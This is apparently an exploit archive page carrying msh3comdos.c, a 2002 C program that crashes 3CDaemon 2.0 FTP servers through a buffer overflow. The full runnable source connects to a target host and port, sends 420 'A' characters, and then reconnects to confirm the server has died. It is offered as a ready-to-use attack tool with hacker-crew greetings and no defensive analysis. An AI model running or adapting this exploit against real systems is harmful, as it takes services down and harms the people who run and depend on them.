exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

msh3comdos.c

msh3comdos.c
Posted May 1, 2002
Authored by Skyrim

3CDaemon FTP Server v2.0 buffer overflow dos exploit.

tags | exploit, overflow
SHA-256 | f356eb7981527a6a7920c4ab593bce2ccab2cacf56294d5cb8ded14619d5adae

msh3comdos.c

Change Mirror Download
/* MaD SKiLL 'H'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
* 1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
*
* This program will exploit the buffer overflow vulnerability of
* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
* at any time they're send.
*
* Tested on:
* [OS] [version]
* Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
*
* ###
* ##### #### ##
* ###### ###### ######
* ###### ######## ######## ######## ######
* ###### ####### ### ########### ######## #######
* ###### ######## #### ############ ######## #######
* ############### ##### ############ ####### #######
* ############## ###### ############ ####### #######
* ############## ####### ########### ###### #######
* ############# ######## ### ######## ###### #########
* ############ ### #### ### ####### #################
* ##### ############### ########## #################
* ### ######### ##### ######### ################
* #### ######### ##### ######### ################
* ### ######### ############# ################
* ## ######### ###### ###### #######
* ### #### ###### #######
* ###### ########
* ###### ########
* #### ## ###### ### ### ### ###### ########
* ####### ######## ### #### ##### ##### #######
* ############### ### #### ##### ##### #######
* ####### ######## #### ##### ## ###
* ###### ######### #### #### #####
* ##### ######## #### #### ####
* ###### ######## #### #### ### #### ##
* ########## ### #### #### ########## ######
* ######### ### ###########################
* ########## ######## #####################
* ############# ###### ########## ##########
* ######## ##### #### ### ### ### ###
*
* I don't know if this will work on versions other then the one I tested it
on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam,
frodo, maxxo,
* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim (skyrim@m4dskill.tk)
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BOFSIZE 420

char banner(void) { printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10
DoS\n.:[MsH]:.\n ---\n"); }

void E(char *msg) { perror(msg); exit(1); }

main(int argc, char *argv[])
{
static char ownage[BOFSIZE];
int sockfd, sockfd2, n;

struct sockaddr_in server_addr;
struct hostent *server;

if (argc != 3) {
fprintf(stderr,"Usage: %s hostname/ip port\n", argv[0]);
exit(1);
}
banner();
memset(ownage, 'A', BOFSIZE);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) E("Error occured during opening socket");
server = gethostbyname(argv[1]);
if (server == NULL) E("Error occured during host lookup -No such
host?-\n");

bzero((char *) &server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr,
(char *)&server_addr.sin_addr.s_addr,
server->h_length);
server_addr.sin_port = htons(atoi(argv[2]));
printf("Connecting to target FTP server... ");
if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E("Error
occured during connecting\n"); }
printf("Connected, Probing BOF... \n");
n = write(sockfd,ownage,strlen(ownage));
if (n < 0) { E("Error occured during writing to socket"); }
close(sockfd);
sockfd2=socket(AF_INET, SOCK_STREAM, 0);
printf("Done, checking if server is dead.. \n");
sleep(5);
if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) {
printf("Couldn't establish connection: It seems like it died! =)\n");
exit(0); }
printf("Server is still alive. Perhaps its not vulnerable?\n");
return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close